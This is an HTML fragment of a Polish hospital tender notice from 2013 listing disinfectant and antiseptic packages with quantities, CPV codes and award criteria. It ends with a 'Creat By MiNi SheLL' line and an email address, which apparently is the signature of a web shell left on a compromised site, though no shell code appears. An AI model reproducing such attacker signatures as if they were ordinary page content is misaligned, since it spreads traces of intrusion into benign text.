2	Płynny, trójenyzmatyczny preparat manualnego mycia zanieczyszczonych narzędzi chirurgicznych, endoskopów i innych wyrobów medycznych o pH neutralnym i działaniu bakteriostatycznym, 
Z pompką dozującą 	 	1 l	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7- Dezynfekcja  i mycie endoskopów w myjni - dezynfektorze OLYMPUS EUROPE mini ETD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płynny środek dezynfekcyjny zawierający 20% aldehyd glutarowy, aktywny w stosunku do bakterii (łącznie z prątkami grużlicy) grzybów i wirusów. Przeznaczony do chemiczno-technicznej dezynfekcji endoskopów i oprzyrządowania w urządzeniu myjąco-dezynfekującym z pompą dozującą	B,,Tbc,
V, F, S	5 l	25
2	Preparat przeznaczony do mycia endoskopów w procesie chemiczno-termicznej dezynfekcji endoskopów i oprzyrządowania w urządzeniu myjąco-dezynfekującym z pompą dozującą	 	5 l	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 - Proszkowe preparaty dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat do dezynfekcji manualnej narzędzi na bazie nadtlenku wodoru, niezawierający aldehydów i chloru, bezwonny w roztworze i  całkowicie rozpuszczalny .Przygotowanie roztworu w wodzie o temp. pokojowej. 	B,F,Tbc V(HIV, HBV, Polio),

S	2 kg	35
2	Aktywator do w/w preparatu poszerzający spektrum działania o prątki gruźlicy i spory.	 	2 l	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 - Dezynfekcja punktowa preparatami w granulacie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat chlorowy w granulkach do zasypywania miejsc skażonych	B,F,V,
Tbc	500 g	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10 Tabletki dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat w postaci tabletek dezynfekcyjnych na bazie aktywnego chloru .	B, F,V,Tbc	Do 1 kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11-Dezynfekcja powierzchni wrażliwych na alkohol przy pomocy chusteczek dezynfekcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chusteczki czyszczące i dezynfekujące małe  powierzchnie ,wyroby medyczne (w tym głowice USG)  oraz endoskopy .Mozliwość stosowania do powierzchni pozostających w kontakcie z żywnością a także inkubatorów	B,Tbc, F,V	Do 100 szt.	15000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12- Preparaty dezynfekcyjne w aerozolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat do dezynfekcji małych powierzchni czystych, na bazie alkoholi i czwartorzędowych soli amoniowych, nie zawierający aldehydów, gotowy do użycia	B, F, MRSA,V ( otoczkowe, bezotoczkowe), Tbc 	0,5 l  rozpylacz	500
2	Preparat do dezynfekcji małych powierzchni czystych, na bazie alkoholi i czwartorzędowych soli amoniowych, nie zawierający aldehydów, gotowy do użycia	B, F, MRSA,V ( otoczkowe, bezotoczkowe), Tbc 	5 l	80
3	Preparat do dezynfekcji  małych powierzchni  i sprzetów medycznych bez zawatości alkoholu , chloru i aldehydu, gotowy do użycia	B,F,V,Tbc	0,5 l  rozpylacz	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13-Preparaty dezynfekcyjne w postaci aktywnej piany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat w postaci aktywnej piany do mycia i dezynfekcji wyrobów medycznych i małych powierzchni. Bez zawartości alkoholu etylowego i bez zawartości chlorków. Możliwość stosowania od 1-go dnia życia 	B,Tbc,F,V 	750 ml	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14- Dezynfekcja  manualna narzędzi, powierzchni, sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płynny trójenzymatyczny preparat do manualnego mycia i dezynfekcji zanieczyszczonych narzędzi chirurgicznych  i innych wyrobów medycznych   działający  w czasie do 5 min.	B,Tbc,F,V 	1l -z dozownikiem	60
2	Płynny trójenzymatyczny preparat do manualnego mycia i dezynfekcji zanieczyszczonych narzędzi chirurgicznych  i innych wyrobów medycznych   działający  w czasie do 5 min.	B,Tbc,F,V 	5 l- z pompką       dozującą 	25
3	Preparat do mycia i dezynfekcji wyrobów medycznych i, wanien z hydromasażem, niskopieniący , skuteczny w obecności  zanieczyszczeń organicznych. Możliwość stosowania w obecności pacjentów, posiadający dobre właściwości myjące w zimnej wodzie. Działający w czasie do 15 min	B,Tbc,F,V (HIV),	1l -z dozownikiem	10
5	Preparat do mycia i dezynfekcji wyrobów medycznych i, wanien z hydromasażem, niskopieniący , skuteczny w obecności  zanieczyszczeń organicznych. Możliwość stosowania w obecności pacjentów, posiadający dobre właściwości myjące w zimnej wodzie. Działający w czasie do 15 min	B,Tbc,F,V (HIV),	5 l- z pompką       dozującą 	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15-  Preparaty dezynfekcyjne sporobócze szybkodziałające.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat dezynfekcyjny o działaniu sporobójczym do szybkiej dezynfekcji i mycia brudnych narzędzi chirurgicznych, endoskopów i innych wyrobów medycznych, bez zawartości aldehydów i fenoli . Czas działania sporobójczego do 20 min.	B, V, grzyby drożdżopodobne, Tbc, S         	Do 1 kg lub saszetki	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16 - Dezynfekcja i mycie narzędzi  powierzchni i sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Skoncentrowany preparat dezynfekcyjno -myjący do dużych powierzchni czystych i zanieczyszczonych organicznie , zawierający  podchloryn sodu 	B,F,V Tbc
W czasie do 15 min.,S w czasie do 60 min.	5 l	10
2	Preparat na bazie nadtlenku wodoru , bez zawartości chloru ,fenolu i aldehydów, do mycia i dezynfekcji powierzchni i sprzętu medycznego .Preparat z możliwością stosowania w obecności pacjentów	B
F,V(otoczkowe, bezotoczkowe) w czasie 15 min.
Tbc w czasie 30 min.	1 l	5
3	Preparat w postaci koncentratu na bazie czwartorzędowych związkow amonowych do dezynfekcji narzędzi i powierzchni posiadający szerokie spektrum działania	B,F,V, Mycobacterium terrae	1 l z dozowni kiem	40
4	Preparat w postaci koncentratu na bazie czwartorzędowych związkow amonowych do dezynfekcji narzędzi i powierzchni posiadający szerokie spektrum działania	B,F,V, Mycobacterium terrae	5 L	30
Wymagania do poz.1 i poz.4: Wymagana pompka dawkująca w ilości 6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17-  Preparaty dezynfekcyjne do likwidacji pleśni i grzybów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Gotowy do użycia preparat na bazie podchlorynu sodu do natychmiastowej likwidacji pleśni i grzybów .Preparat ma wysokie właściwości bakteriobójcze, odświeża powierzchnie 	 	0,5 l  rozpylacz	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 18-Preparaty antyseptyczne na bazie oktenidyny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat do dezynfekcji ran,błon śluzowych bezbarwny ,bez zawartości jodu 	B(MRSA),F.V
(HBV,HIV,Herpes simplex)	250 ml	200
2	Preparat do dezynfekcji ran,błon śluzowych bezbarwny ,bez zawartości jodu 	B(MRSA),F.V
(HBV,HIV,Herpes simplex)	1 l	40
3	Antybakteryjna emulsja do mycia ciała o działaniu bakteriobójczym , zawierająca octenidynę, o pH neutralnym dla skóry	MRSA, Enterococcus hirae, Pseudomonas aeruginosa, E.coli
w czasie 60 s	500 ml	20
6	Preparat do nawilżania ,oczyszczania skolonizowanych,skontaminowanych ran przewlekłych w postaci żelu .Bez zawartości barwników i alkoholu.	F,B( MRSA, VRE, E.coli, Pseudomonas aeruginosa,Acinetobacter Baumannie)	20 ml	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com